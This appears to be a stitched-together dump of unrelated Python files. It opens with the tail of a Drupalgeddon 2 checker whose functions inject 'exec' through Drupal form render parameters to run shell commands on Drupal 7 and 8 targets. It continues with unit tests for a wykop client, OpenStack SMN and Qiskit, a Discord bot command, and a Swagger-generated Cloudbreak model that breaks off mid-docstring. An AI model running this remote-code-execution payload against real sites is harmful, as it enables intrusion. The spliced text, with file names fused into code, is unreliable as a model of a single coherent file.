}, ] return expInfo requests.packages.urllib3.disable_warnings() def get_random_string(len=20): return ''.join([random.choice(string.ascii_letters) for _ in range(len)]) def check_vulnerable_8(base_url): headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = get_random_string() cmd = urllib.quote('echo {0} | base64 -d'.format(base64.b64encode(r))) url = base_url + '/user/register?element_parents=timezone/timezone/%23value&ajax_form=1' data = 'form_id=user_register_form&_drupal_ajax=1&timezone[#post_render][]=exec&timezone[#markup]={0}'.format(cmd) resp = requests.post(url, data, headers=headers, verify=False) if r in str(resp.content): return True return False def check_vulnerable_7(base_url): headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = get_random_string() cmd = urllib.quote('echo {0} | base64 -d'.format(base64.b64encode(r))) url = base_url + '/user/password?name[%23post_render][0]=exec&name[%23markup]={0}'.format(cmd) data = 'form_build_id=&form_id=user_pass&_triggering_element_name=name&_triggering_element_value=' resp = requests.post(url, data, headers=headers, verify=False) if resp.status_code != 200: return False soup = BeautifulSoup(resp.content, 'lxml') form_build_id = soup.find('input', {'name': 'form_build_id'}).get('value') url = base_url + '/file/ajax/name/%23value/' + form_build_id data = 'form_build_id={0}'.format(form_build_id) resp = requests.post(url, data, headers=headers, verify=False) if r in str(resp.content): return True return False # target like http://ip/ def exploit(target, headers=None): vulnerable1 = check_vulnerable_7(target) vulnerable2 = check_vulnerable_8(target) if vulnerable1: result = 'Drupal 7 target `{0}` is vulnerable !'.format(target) elif vulnerable2: result = 'Drupal 8 target `{0}` is vulnerable bingo!!!'.format(target) else: result = 'Target {0} seems not vulnerable to Drupalgeddon 2.'.format(target) return result10-100 # -*- encoding: utf-8 -*- import mock import pytest from six import b, text_type as u, binary_type from wykop.api.exceptions.resolvers import ExceptionResolver class MockStdout(object): def __init__(self, encoding=None): if encoding is not None: self.encoding = encoding class TestExceptionResolverInit(object): def test_initialized(self): exceptions = mock.sentinel.exceptions resolver = ExceptionResolver(exceptions) assert resolver.exceptions == exceptions class TestExceptionResolverGetClass(object): def test_existing(self, exception_resolver): code, klass = list(exception_resolver.exceptions.items())[0] test_class = type('TestException', (object,), {}) result = exception_resolver.get_class(code, test_class) assert result == klass assert result != test_class def test_default(self, exception_resolver): code = 999 test_class = type('TestException', (object,), {}) result = exception_resolver.get_class(code, test_class) assert result == test_class class TestExceptionResolverGetMessage(object): @pytest.mark.parametrize('message, expected', [ (u'\u0105\u015b\u017c\u017amessage', b'\xc4\x85\xc5\x9b\xc5\xbc\xc5\xbamessage'), (b'\xc4\x85\xc5\x9b\xc5\xbc\xc5\xbamessage', b'\xc4\x85\xc5\x9b\xc5\xbc\xc5\xbamessage'), ]) @mock.patch('sys.stdout', MockStdout()) def test_no_stdout_encoding(self, message, expected, exception_resolver): result = exception_resolver.get_message(message) assert type(result) == binary_type assert result == expected @pytest.mark.parametrize('message, expected', [ (u'\u0105\u015b\u017c\u017amessage', b'\xc4\x85\xc5\x9b\xc5\xbc\xc5\xbamessage'), 
(b'\xc4\x85\xc5\x9b\xc5\xbc\xc5\xbamessage', b'\xc4\x85\xc5\x9b\xc5\xbc\xc5\xbamessage'), ]) @mock.patch('sys.stdout', MockStdout('utf-8')) def test_stdout_encoding(self, message, expected, exception_resolver): result = exception_resolver.get_message(message) assert type(result) == binary_type assert result == expected class TestExceptionResolverResolve(object): @mock.patch.object(ExceptionResolver, 'get_message') @mock.patch.object(ExceptionResolver, 'get_class') def test_resolved( self, mocked_get_class, mocked_get_message, exception_resolver): code = mock.sentinel.code msg = mock.sentinel.msg default_class = mock.sentinel.default_class klass = type('TestClass', (object,), {'__init__': lambda x, y: None}) message = mock.sentinel.message mocked_get_class.return_value = klass mocked_get_message.return_value = message result = exception_resolver.resolve(code, msg, default_class) mocked_get_class.assert_called_once_with(code, default_class) mocked_get_message.assert_called_once_with(msg) assert type(result) == klass # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import mock from openstack.smn.v2 import _proxy from openstack.smn.v2 import message_template as _message_template from openstack.smn.v2 import subscription as _subscription from openstack.smn.v2 import topic as _topic from openstack.tests.unit import test_proxy_base2 class TestSMNProxy(test_proxy_base2.TestProxyBase): def setUp(self): super(TestSMNProxy, self).setUp() self.proxy = _proxy.Proxy(self.session) def test_create_topic(self): self.verify_create(self.proxy.create_topic, _topic.Topic) def test_topics(self): self.verify_list(self.proxy.topics, _topic.Topic) def test_delete_topic(self): self.verify_delete(self.proxy.delete_topic, _topic.Topic, True) def test_get_topic(self): self.verify_get(self.proxy.get_topic, _topic.Topic) def test_update_topic(self): self.verify_update(self.proxy.update_topic, _topic.Topic) def test_get_topic_attr(self): topic = '123' self.verify_list(self.proxy.get_topic_attr, _topic.TopicAttr, paginated=False, method_args=[topic], expected_kwargs={'topic_urn': topic}) def test_update_topic_attr(self): topic_attr_dict = {'topic_urn': 'fakeurn'} topic_attr = _topic.TopicAttr(**topic_attr_dict) attrname = 'attr' value = 'val' self._verify2('openstack.proxy2.BaseProxy._update', self.proxy.update_topic_attr, method_args=[topic_attr, attrname, value], expected_args=[mock.ANY, topic_attr], expected_kwargs={'topic_urn': 'fakeurn', 'attributes_name': attrname, 'attr_value': value}) def test_delete_topic_attr(self): topic_attr_dict = {'topic_urn': 'fakeurn'} topic_attr = _topic.TopicAttr(**topic_attr_dict) attrname = 'attr' self._verify2('openstack.proxy2.BaseProxy._delete', self.proxy.delete_topic_attr, method_args=[topic_attr, attrname], expected_args=[mock.ANY, topic_attr], expected_kwargs={'topic_urn': 'fakeurn', 'attributes_name': attrname}) def test_delete_topic_attrs(self): self._verify2('openstack.smn.v2.topic.TopicAttr.delete_all', self.proxy.delete_topic_attrs, method_args=['topic_urn'], expected_args=[mock.ANY], 
expected_kwargs={'topic_urn': 'topic_urn'}) def test_subscriptions(self): self.verify_list(self.proxy.subscriptions, _subscription.Subscription) def test_subscript_topic(self): self._verify2('openstack.proxy2.BaseProxy._create', self.proxy.subscript_topic, method_args=["topic_urn"], expected_args=[mock.ANY], expected_kwargs={'topic_urn': 'topic_urn'}) def test_unsubscript_topic(self): self.verify_delete(self.proxy.unsubscript_topic, _subscription.Subscription, True) def test_confirm_subcription(self): pass def test_create_message_template(self): self.verify_create(self.proxy.create_message_template, _message_template.MessageTemplate) def test_message_templates(self): self.verify_list(self.proxy.message_templates, _message_template.MessageTemplate, paginated=False) def test_get_message_template(self): self.verify_get(self.proxy.get_message_template, _message_template.MessageTemplate) def test_update_message_template(self): self.verify_update(self.proxy.update_message_template, _message_template.MessageTemplate) def test_delete_message_template(self): self.verify_delete(self.proxy.delete_message_template, _message_template.MessageTemplate, True) def test_publish_topic(self): pass def test_direct_publish(self): pass # This code is part of Qiskit. # # (C) Copyright IBM 2017, 2018. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """Test Qiskit's inverse gate operation.""" import unittest import numpy as np from qiskit import QuantumRegister, ClassicalRegister, QuantumCircuit, pulse from qiskit.circuit.library import RXGate, RYGate from qiskit.test import QiskitTestCase from qiskit.circuit.exceptions import CircuitError # pylint: disable=unused-import from qiskit.extensions.simulator import Snapshot class TestCircuitProperties(QiskitTestCase): """QuantumCircuit properties tests.""" def test_qarg_numpy_int(self): """Test castable to integer args for QuantumCircuit. """ n = np.int64(12) qc1 = QuantumCircuit(n) self.assertEqual(qc1.num_qubits, 12) self.assertEqual(type(qc1), QuantumCircuit) def test_carg_numpy_int(self): """Test castable to integer cargs for QuantumCircuit. """ n = np.int64(12) c1 = ClassicalRegister(n) qc1 = QuantumCircuit(c1) c_regs = qc1.cregs self.assertEqual(c_regs[0], c1) self.assertEqual(type(qc1), QuantumCircuit) def test_carg_numpy_int_2(self): """Test castable to integer cargs for QuantumCircuit. """ qc1 = QuantumCircuit(12, np.int64(12)) c_regs = qc1.cregs self.assertEqual(c_regs[0], ClassicalRegister(12, 'c')) self.assertEqual(type(qc1), QuantumCircuit) def test_qarg_numpy_int_exception(self): """Test attempt to pass non-castable arg to QuantumCircuit. 
""" self.assertRaises(CircuitError, QuantumCircuit, 'string') def test_warning_on_noninteger_float(self): """Test warning when passing non-integer float to QuantumCircuit """ self.assertRaises(CircuitError, QuantumCircuit, 2.2) # but an integer float should pass qc = QuantumCircuit(2.0) self.assertEqual(qc.num_qubits, 2) def test_circuit_depth_empty(self): """Test depth of empty circuity """ q = QuantumRegister(5, 'q') qc = QuantumCircuit(q) self.assertEqual(qc.depth(), 0) def test_circuit_depth_no_reg(self): """Test depth of no register circuits """ qc = QuantumCircuit() self.assertEqual(qc.depth(), 0) def test_circuit_depth_meas_only(self): """Test depth of measurement only """ q = QuantumRegister(1, 'q') c = ClassicalRegister(1, 'c') qc = QuantumCircuit(q, c) qc.measure(q, c) self.assertEqual(qc.depth(), 1) def test_circuit_depth_barrier(self): """Make sure barriers do not add to depth """ q = QuantumRegister(5, 'q') c = ClassicalRegister(5, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.h(q[4]) qc.cx(q[0], q[1]) qc.cx(q[1], q[4]) qc.cx(q[4], q[2]) qc.cx(q[2], q[3]) qc.barrier(q) qc.measure(q, c) self.assertEqual(qc.depth(), 6) def test_circuit_depth_simple(self): """Test depth for simple circuit """ q = QuantumRegister(5, 'q') c = ClassicalRegister(1, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.cx(q[0], q[4]) qc.x(q[2]) qc.x(q[2]) qc.x(q[2]) qc.x(q[4]) qc.cx(q[4], q[1]) qc.measure(q[1], c[0]) self.assertEqual(qc.depth(), 5) def test_circuit_depth_multi_reg(self): """Test depth for multiple registers """ q1 = QuantumRegister(3, 'q1') q2 = QuantumRegister(2, 'q2') c = ClassicalRegister(5, 'c') qc = QuantumCircuit(q1, q2, c) qc.h(q1[0]) qc.h(q1[1]) qc.h(q1[2]) qc.h(q2[0]) qc.h(q2[1]) qc.cx(q1[0], q1[1]) qc.cx(q1[1], q2[1]) qc.cx(q2[1], q1[2]) qc.cx(q1[2], q2[0]) self.assertEqual(qc.depth(), 5) def test_circuit_depth_3q_gate(self): """Test depth for 3q gate """ q1 = QuantumRegister(3, 'q1') q2 = QuantumRegister(2, 'q2') c = ClassicalRegister(5, 'c') qc = QuantumCircuit(q1, q2, c) qc.h(q1[0]) qc.h(q1[1]) qc.h(q1[2]) qc.h(q2[0]) qc.h(q2[1]) qc.ccx(q2[1], q1[0], q2[0]) qc.cx(q1[0], q1[1]) qc.cx(q1[1], q2[1]) qc.cx(q2[1], q1[2]) qc.cx(q1[2], q2[0]) self.assertEqual(qc.depth(), 6) def test_circuit_depth_conditionals1(self): """Test circuit depth for conditional gates #1. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.cx(q[0], q[1]) qc.cx(q[2], q[3]) qc.measure(q[0], c[0]) qc.measure(q[1], c[1]) qc.h(q[2]).c_if(c, 2) qc.h(q[3]).c_if(c, 4) self.assertEqual(qc.depth(), 5) def test_circuit_depth_conditionals2(self): """Test circuit depth for conditional gates #2. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.cx(q[0], q[1]) qc.cx(q[2], q[3]) qc.measure(q[0], c[0]) qc.measure(q[0], c[0]) qc.h(q[2]).c_if(c, 2) qc.h(q[3]).c_if(c, 4) self.assertEqual(qc.depth(), 6) def test_circuit_depth_conditionals3(self): """Test circuit depth for conditional gates #3. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.measure(q[0], c[0]) qc.cx(q[0], q[3]).c_if(c, 2) qc.measure(q[1], c[1]) qc.measure(q[2], c[2]) qc.measure(q[3], c[3]) self.assertEqual(qc.depth(), 4) def test_circuit_depth_measurements1(self): """Test circuit depth for measurements #1. 
""" size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.measure(q[0], c[0]) qc.measure(q[1], c[1]) qc.measure(q[2], c[2]) qc.measure(q[3], c[3]) self.assertEqual(qc.depth(), 2) def test_circuit_depth_measurements2(self): """Test circuit depth for measurements #2. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.measure(q[0], c[0]) qc.measure(q[0], c[1]) qc.measure(q[0], c[2]) qc.measure(q[0], c[3]) self.assertEqual(qc.depth(), 5) def test_circuit_depth_measurements3(self): """Test circuit depth for measurements #3. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.measure(q[0], c[0]) qc.measure(q[1], c[0]) qc.measure(q[2], c[0]) qc.measure(q[3], c[0]) self.assertEqual(qc.depth(), 5) def test_circuit_depth_barriers1(self): """Test circuit depth for barriers #1. """ q = QuantumRegister(4, 'q') c = ClassicalRegister(4, 'c') circ = QuantumCircuit(q, c) circ.h(0) circ.cx(0, 1) circ.barrier(q) circ.h(2) circ.cx(2, 3) self.assertEqual(circ.depth(), 4) def test_circuit_depth_barriers2(self): """Test circuit depth for barriers #2. """ q = QuantumRegister(4, 'q') c = ClassicalRegister(4, 'c') circ = QuantumCircuit(q, c) circ.h(0) circ.barrier(q) circ.cx(0, 1) circ.barrier(q) circ.h(2) circ.barrier(q) circ.cx(2, 3) self.assertEqual(circ.depth(), 4) def test_circuit_depth_barriers3(self): """Test circuit depth for barriers #3. """ q = QuantumRegister(4, 'q') c = ClassicalRegister(4, 'c') circ = QuantumCircuit(q, c) circ.h(0) circ.barrier(q) circ.cx(0, 1) circ.barrier(q) circ.barrier(q) circ.barrier(q) circ.h(2) circ.barrier(q) circ.cx(2, 3) self.assertEqual(circ.depth(), 4) def test_circuit_depth_snap1(self): """Test circuit depth for snapshots #1. """ q = QuantumRegister(4, 'q') c = ClassicalRegister(4, 'c') circ = QuantumCircuit(q, c) circ.h(0) circ.cx(0, 1) circ.append(Snapshot('snap', num_qubits=4), [0, 1, 2, 3]) circ.h(2) circ.cx(2, 3) self.assertEqual(circ.depth(), 4) def test_circuit_depth_snap2(self): """Test circuit depth for snapshots #2. """ q = QuantumRegister(4, 'q') c = ClassicalRegister(4, 'c') circ = QuantumCircuit(q, c) circ.h(0) circ.append(Snapshot('snap0', num_qubits=4), [0, 1, 2, 3]) circ.cx(0, 1) circ.append(Snapshot('snap1', num_qubits=4), [0, 1, 2, 3]) circ.h(2) circ.append(Snapshot('snap2', num_qubits=4), [0, 1, 2, 3]) circ.cx(2, 3) self.assertEqual(circ.depth(), 4) def test_circuit_depth_snap3(self): """Test circuit depth for snapshots #3. 
""" q = QuantumRegister(4, 'q') c = ClassicalRegister(4, 'c') circ = QuantumCircuit(q, c) circ.h(0) circ.cx(0, 1) circ.append(Snapshot('snap0', num_qubits=4), [0, 1, 2, 3]) circ.append(Snapshot('snap1', num_qubits=4), [0, 1, 2, 3]) circ.h(2) circ.cx(2, 3) self.assertEqual(circ.depth(), 4) def test_circuit_size_empty(self): """Circuit.size should return 0 for an empty circuit.""" size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) self.assertEqual(qc.size(), 0) def test_circuit_size_single_qubit_gates(self): """Circuit.size should increment for each added single qubit gate.""" size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) self.assertEqual(qc.size(), 1) qc.h(q[1]) self.assertEqual(qc.size(), 2) def test_circuit_size_two_qubit_gates(self): """Circuit.size should increment for each added two qubit gate.""" size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.cx(q[0], q[1]) self.assertEqual(qc.size(), 1) qc.cx(q[2], q[3]) self.assertEqual(qc.size(), 2) def test_circuit_size_ignores_barriers_snapshots(self): """Circuit.size should not count barriers or snapshots.""" q = QuantumRegister(4, 'q') c = ClassicalRegister(4, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.cx(q[0], q[1]) self.assertEqual(qc.size(), 2) qc.barrier(q) self.assertEqual(qc.size(), 2) qc.append(Snapshot('snapshot_label', num_qubits=4), [0, 1, 2, 3]) self.assertEqual(qc.size(), 2) def test_circuit_count_ops(self): """Test circuit count ops. """ q = QuantumRegister(6, 'q') qc = QuantumCircuit(q) qc.h(q) qc.x(q[1]) qc.y(q[2:4]) qc.z(q[3:]) result = qc.count_ops() expected = dict([('h', 6), ('z', 3), ('y', 2), ('x', 1)]) self.assertIsInstance(result, dict) self.assertEqual(expected, result) def test_circuit_nonlocal_gates(self): """Test num_nonlocal_gates. """ q = QuantumRegister(6, 'q') c = ClassicalRegister(2, 'c') qc = QuantumCircuit(q, c) qc.h(q) qc.x(q[1]) qc.cry(0.1, q[2], q[4]) qc.z(q[3:]) qc.cswap(q[1], q[2], q[3]) qc.iswap(q[0], q[4]).c_if(c, 2) result = qc.num_nonlocal_gates() expected = 3 self.assertEqual(expected, result) def test_circuit_nonlocal_gates_no_instruction(self): """Verify num_nunlocal_gates does not include barriers. """ # ref: https://github.com/Qiskit/qiskit-terra/issues/4500 n = 3 qc = QuantumCircuit(n) qc.h(range(n)) qc.barrier() self.assertEqual(qc.num_nonlocal_gates(), 0) def test_circuit_connected_components_empty(self): """Verify num_connected_components is width for empty """ q = QuantumRegister(7, 'q') qc = QuantumCircuit(q) self.assertEqual(7, qc.num_connected_components()) def test_circuit_connected_components_multi_reg(self): """Test tensor factors works over multi registers """ q1 = QuantumRegister(3, 'q1') q2 = QuantumRegister(2, 'q2') qc = QuantumCircuit(q1, q2) qc.h(q1[0]) qc.h(q1[1]) qc.h(q1[2]) qc.h(q2[0]) qc.h(q2[1]) qc.cx(q1[0], q1[1]) qc.cx(q1[1], q2[1]) qc.cx(q2[1], q1[2]) qc.cx(q1[2], q2[0]) self.assertEqual(qc.num_connected_components(), 1) def test_circuit_connected_components_multi_reg2(self): """Test tensor factors works over multi registers #2. """ q1 = QuantumRegister(3, 'q1') q2 = QuantumRegister(2, 'q2') qc = QuantumCircuit(q1, q2) qc.cx(q1[0], q2[1]) qc.cx(q2[0], q1[2]) qc.cx(q1[1], q2[0]) self.assertEqual(qc.num_connected_components(), 2) def test_circuit_connected_components_disconnected(self): """Test tensor factors works with 2q subspaces. 
""" q1 = QuantumRegister(5, 'q1') q2 = QuantumRegister(5, 'q2') qc = QuantumCircuit(q1, q2) qc.cx(q1[0], q2[4]) qc.cx(q1[1], q2[3]) qc.cx(q1[2], q2[2]) qc.cx(q1[3], q2[1]) qc.cx(q1[4], q2[0]) self.assertEqual(qc.num_connected_components(), 5) def test_circuit_connected_components_with_clbits(self): """Test tensor components with classical register. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.measure(q[0], c[0]) qc.measure(q[1], c[1]) qc.measure(q[2], c[2]) qc.measure(q[3], c[3]) self.assertEqual(qc.num_connected_components(), 4) def test_circuit_connected_components_with_cond(self): """Test tensor components with conditional gate. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.measure(q[0], c[0]) qc.cx(q[0], q[3]).c_if(c, 2) qc.measure(q[1], c[1]) qc.measure(q[2], c[2]) qc.measure(q[3], c[3]) self.assertEqual(qc.num_connected_components(), 1) def test_circuit_unitary_factors1(self): """Test unitary factors empty circuit. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) self.assertEqual(qc.num_unitary_factors(), 4) def test_circuit_unitary_factors2(self): """Test unitary factors multi qregs """ q1 = QuantumRegister(2, 'q1') q2 = QuantumRegister(2, 'q2') c = ClassicalRegister(4, 'c') qc = QuantumCircuit(q1, q2, c) self.assertEqual(qc.num_unitary_factors(), 4) def test_circuit_unitary_factors3(self): """Test unitary factors measurements and conditionals. """ size = 4 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.cx(q[1], q[2]) qc.cx(q[1], q[2]) qc.cx(q[0], q[3]).c_if(c, 2) qc.cx(q[0], q[3]) qc.cx(q[0], q[3]) qc.cx(q[0], q[3]) qc.measure(q[0], c[0]) qc.measure(q[1], c[1]) qc.measure(q[2], c[2]) qc.measure(q[3], c[3]) self.assertEqual(qc.num_unitary_factors(), 2) def test_circuit_unitary_factors4(self): """Test unitary factors measurements go to same cbit. """ size = 5 q = QuantumRegister(size, 'q') c = ClassicalRegister(size, 'c') qc = QuantumCircuit(q, c) qc.h(q[0]) qc.h(q[1]) qc.h(q[2]) qc.h(q[3]) qc.measure(q[0], c[0]) qc.measure(q[1], c[0]) qc.measure(q[2], c[0]) qc.measure(q[3], c[0]) self.assertEqual(qc.num_unitary_factors(), 5) def test_num_qubits_qubitless_circuit(self): """Check output in absence of qubits. """ c_reg = ClassicalRegister(3) circ = QuantumCircuit(c_reg) self.assertEqual(circ.num_qubits, 0) def test_num_qubits_qubitfull_circuit(self): """Check output in presence of qubits """ q_reg = QuantumRegister(4) c_reg = ClassicalRegister(3) circ = QuantumCircuit(q_reg, c_reg) self.assertEqual(circ.num_qubits, 4) def test_num_qubits_registerless_circuit(self): """Check output for circuits with direct argument for qubits. """ circ = QuantumCircuit(5) self.assertEqual(circ.num_qubits, 5) def test_num_qubits_multiple_register_circuit(self): """Check output for circuits with multiple quantum registers. 
""" q_reg1 = QuantumRegister(5) q_reg2 = QuantumRegister(6) q_reg3 = QuantumRegister(7) circ = QuantumCircuit(q_reg1, q_reg2, q_reg3) self.assertEqual(circ.num_qubits, 18) def test_calibrations_basis_gates(self): """Check if the calibrations for basis gates provided are added correctly.""" circ = QuantumCircuit(2) with pulse.build() as q0_x180: pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0)) with pulse.build() as q1_y90: pulse.play(pulse.library.Gaussian(20, -1.0, 3.0), pulse.DriveChannel(1)) # Add calibration circ.add_calibration(RXGate(3.14), [0], q0_x180) circ.add_calibration(RYGate(1.57), [1], q1_y90) self.assertEqual(set(circ.calibrations.keys()), {'rx', 'ry'}) self.assertEqual(set(circ.calibrations['rx'].keys()), {((0,), (3.14,))}) self.assertEqual(set(circ.calibrations['ry'].keys()), {((1,), (1.57,))}) self.assertEqual(circ.calibrations['rx'][((0,), (3.14,))].instructions, q0_x180.instructions) self.assertEqual(circ.calibrations['ry'][((1,), (1.57,))].instructions, q1_y90.instructions) def test_calibrations_custom_gates(self): """Check if the calibrations for custom gates with params provided are added correctly.""" circ = QuantumCircuit(3) with pulse.build() as q0_x180: pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0)) # Add calibrations with a custom gate 'rxt' circ.add_calibration('rxt', [0], q0_x180, params=[1.57, 3.14, 4.71]) self.assertEqual(set(circ.calibrations.keys()), {'rxt'}) self.assertEqual(set(circ.calibrations['rxt'].keys()), {((0,), (1.57, 3.14, 4.71))}) self.assertEqual(circ.calibrations['rxt'][((0,), (1.57, 3.14, 4.71))].instructions, q0_x180.instructions) def test_calibrations_no_params(self): """Check calibrations if the no params is provided with just gate name.""" circ = QuantumCircuit(3) with pulse.build() as q0_x180: pulse.play(pulse.library.Gaussian(20, 1.0, 3.0), pulse.DriveChannel(0)) circ.add_calibration('h', [0], q0_x180) self.assertEqual(set(circ.calibrations.keys()), {'h'}) self.assertEqual(set(circ.calibrations['h'].keys()), {((0,), ())}) self.assertEqual(circ.calibrations['h'][((0,), ())].instructions, q0_x180.instructions) if __name__ == '__main__': unittest.main() modules/htm.py1-10 from client import client import discord @client.command(trigger="htm") async def handle(command: str, message: discord.Message): e = discord.Embed(title="htm irl", description=discord.Embed.Empty, colour=discord.Embed.Empty) e.set_image(url="https://cdn.discordapp.com/attachments/377206780700393473/469686997066317824/unknown.png") e.set_footer(text="Command idea by @Hunter#4540") await message.channel.send(embed=e) return # coding: utf-8 """ Cloudbreak API Cloudbreak is a powerful left surf that breaks over a coral reef, a mile off southwest the island of Tavarua, Fiji. Cloudbreak is a cloud agnostic Hadoop as a Service API. Abstracts the provisioning and ease management and monitoring of on-demand clusters. SequenceIQ's Cloudbreak is a RESTful application development platform with the goal of helping developers to build solutions for deploying Hadoop YARN clusters in different environments. Once it is deployed in your favourite servlet container it exposes a REST API allowing to span up Hadoop clusters of arbitary sizes and cloud providers. Provisioning Hadoop has never been easier. Cloudbreak is built on the foundation of cloud providers API (Amazon AWS, Microsoft Azure, Google Cloud Platform, Openstack), Apache Ambari, Docker lightweight containers, Swarm and Consul. 
For further product documentation follow the link: http://hortonworks.com/apache/cloudbreak/ OpenAPI spec version: 2.9.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from pprint import pformat from six import iteritems import re class BaseImageResponse(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'hdp_stacks': 'list[StackDetailsJson]', 'hdf_stacks': 'list[StackDetailsJson]', '_date': 'str', 'description': 'str', 'os': 'str', 'os_type': 'str', 'uuid': 'str', 'version': 'str', 'repo': 'dict(str, str)', 'images': 'dict(str, dict(str, str))', 'stack_details': 'StackDetailsJson', 'default_image': 'bool', 'package_versions': 'dict(str, str)' } attribute_map = { 'hdp_stacks': 'hdpStacks', 'hdf_stacks': 'hdfStacks', '_date': 'date', 'description': 'description', 'os': 'os', 'os_type': 'osType', 'uuid': 'uuid', 'version': 'version', 'repo': 'repo', 'images': 'images', 'stack_details': 'stackDetails', 'default_image': 'defaultImage', 'package_versions': 'packageVersions' } def __init__(self, hdp_stacks=None, hdf_stacks=None, _date=None, description=None, os=None, os_type=None, uuid=None, version=None, repo=None, images=None, stack_details=None, default_image=False, package_versions=None): """ BaseImageResponse - a model defined in Swagger """ self._hdp_stacks = None self._hdf_stacks = None self.__date = None self._description = None self._os = None self._os_type = None self._uuid = None self._version = None self._repo = None self._images = None self._stack_details = None self._default_image = None self._package_versions = None if hdp_stacks is not None: self.hdp_stacks = hdp_stacks if hdf_stacks is not None: self.hdf_stacks = hdf_stacks if _date is not None: self._date = _date if description is not None: self.description = description if os is not None: self.os = os if os_type is not None: self.os_type = os_type if uuid is not None: self.uuid = uuid if version is not None: self.version = version if repo is not None: self.repo = repo if images is not None: self.images = images if stack_details is not None: self.stack_details = stack_details if default_image is not None: self.default_image = default_image if package_versions is not None: self.package_versions = package_versions @property def hdp_stacks(self): """ Gets the hdp_stacks of this BaseImageResponse. :return: The hdp_stacks of this BaseImageResponse. :rtype: list[StackDetailsJson] """ return self._hdp_stacks @hdp_stacks.setter def hdp_stacks(self, hdp_stacks): """ Sets the hdp_stacks of this BaseImageResponse. :param hdp_stacks: The hdp_stacks of this BaseImageResponse. :type: list[StackDetailsJson] """ self._hdp_stacks = hdp_stacks @property def hdf_stacks(self): """ Gets the hdf_stacks of this BaseImageResponse. :return: The hdf_stacks of this BaseImageResponse. :rtype: list[StackDetailsJson] """ return self._hdf_stacks @hdf_stacks.setter def hdf_stacks(self, hdf_stacks): """ Sets the hdf_stacks of this BaseImageResponse. :param hdf_stacks: The hdf_stacks of this BaseImageResponse. :type: list[StackDetailsJson] """ self._hdf_stacks = hdf_stacks @property def _date(self): """ Gets the _date of this BaseImageResponse. :return: The _date of this BaseImageResponse. 
:rtype: str """ return self.__date @_date.setter def _date(self, _date): """ Sets the _date of this BaseImageResponse. :param _date: The _date of this BaseImageResponse. :type: str """ self.__date = _date @property def description(self): """ Gets the description of this BaseImageResponse. :return: The description of this BaseImageResponse. :rtype: str """ return self._description @description.setter def description(self, description): """ Sets the description of this BaseImageResponse. :param description: The description of this BaseImageResponse. :type: str """ self._description = description @property def os(self): """ Gets the os of this BaseImageResponse. :return: The os of this BaseImageResponse. :rtype: str """ return self._os @os.setter def os(self, os): """ Sets the os of this BaseImageResponse. :param os: The os of this BaseImageResponse. :type: str """ self._os = os @property def os_type(self): """ Gets the os_type of this BaseImageResponse. :return: The os_type of this BaseImageResponse. :rtype: str """ return self._os_type @os_type.setter def os_type(self, os_type): """ Sets the os_type of this BaseImageResponse. :param os_type: The os_type of this BaseImageResponse. :type: str """ self._os_type = os_type @property def uuid(self): """ Gets the uuid of this BaseImageResponse. :return: The uuid of this BaseImageResponse. :rtype: str """ return self._uuid @uuid.setter def uuid(self, uuid): """ Sets the uuid of this BaseImageResponse. :param uuid: The uuid of this 